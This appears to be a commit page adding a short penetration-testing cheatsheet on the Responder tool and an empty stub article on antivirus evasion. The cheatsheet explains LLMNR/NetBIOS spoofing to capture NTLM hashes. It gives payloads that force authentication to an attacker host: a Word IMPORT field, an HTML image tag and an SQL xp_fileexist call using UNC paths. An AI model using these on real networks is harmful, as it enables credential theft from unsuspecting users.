浏览代码

added first responder cheatsheet version

Marius Schwarz 4 年之前
父节点
当前提交
d0fd862182
共有 2 个文件被更改,包括 78 次插入0 次删除
  1. 9 0
      articles/shellcode-block-reordering.md
  2. 69 0
      cheatsheets/security/windows/responder.md

+ 9 - 0
articles/shellcode-block-reordering.md

@@ -0,0 +1,9 @@
+---
+title: AV Evasion: Practical Block Reordering
+date: 2021-01-18
+categories: [articles]
+tags: [malware, av, shellcodeA
+---
+
+
+]

+ 69 - 0
cheatsheets/security/windows/responder.md

@@ -0,0 +1,69 @@
+---
+title: Responder
+date: 2021-04-13
+categories: [cheatsheets]
+tags: [security, windows]
+---
+
+
+# Responder
+
+## General Features
+
+* LLMNR Spoofing
+* Netbios Spoofing
+* Capturing NTLM Hashes
+
+## Usage
+
+* Start by analysing the traffic with: `Responder -A`
+
+
+## LLMNR & Netbios Spoofing
+
+When computers ask for a unknown domain name the PC asks the network via broadcast.
+Responder can answer to those LLMNR Questions and phish NTLM hashes by telling
+the victim that the responder host is the goal computer.
+
+**Occures when accessing:**
+
+* Mistyped share name
+* Mistyped webpage
+* Miconfigured DNS server/client
+* WPAD (Every false attempt will result in a broadcast)
+* Windows automatically searches when typing stuff into the Windows Menu (Win Key)
+
+## NTLM via UNC Path
+
+### Word Files
+
+* [ ] Tested
+
+Open Word
+    -> Ctrl+F9
+        -> IMPORT "\\\\<Responder-IP>\\1.jpg"
+            -> Right Click
+                -> Edit Field
+                    -> check "Data not stored in document"
+                        -> Save & Close
+
+### HTML Files
+
+Just link to an Image from a share:
+
+```
+<img src="\\<responder-ip>\1.jpg">
+```
+
+### SQL Servers
+
+* If an attacker owned an SQL user that can execute the `xp_fileexist` function, a UNC path can be specified:
+
+```
+EXEC master.dbo.xp_fileexist '\\<responder-ip>\\nonexistingfile'
+```
+
+# Resources
+
+- https://www.cynet.com/attack-techniques-hands-on/llmnr-nbt-ns-poisoning-and-credential-access-using-responder/
+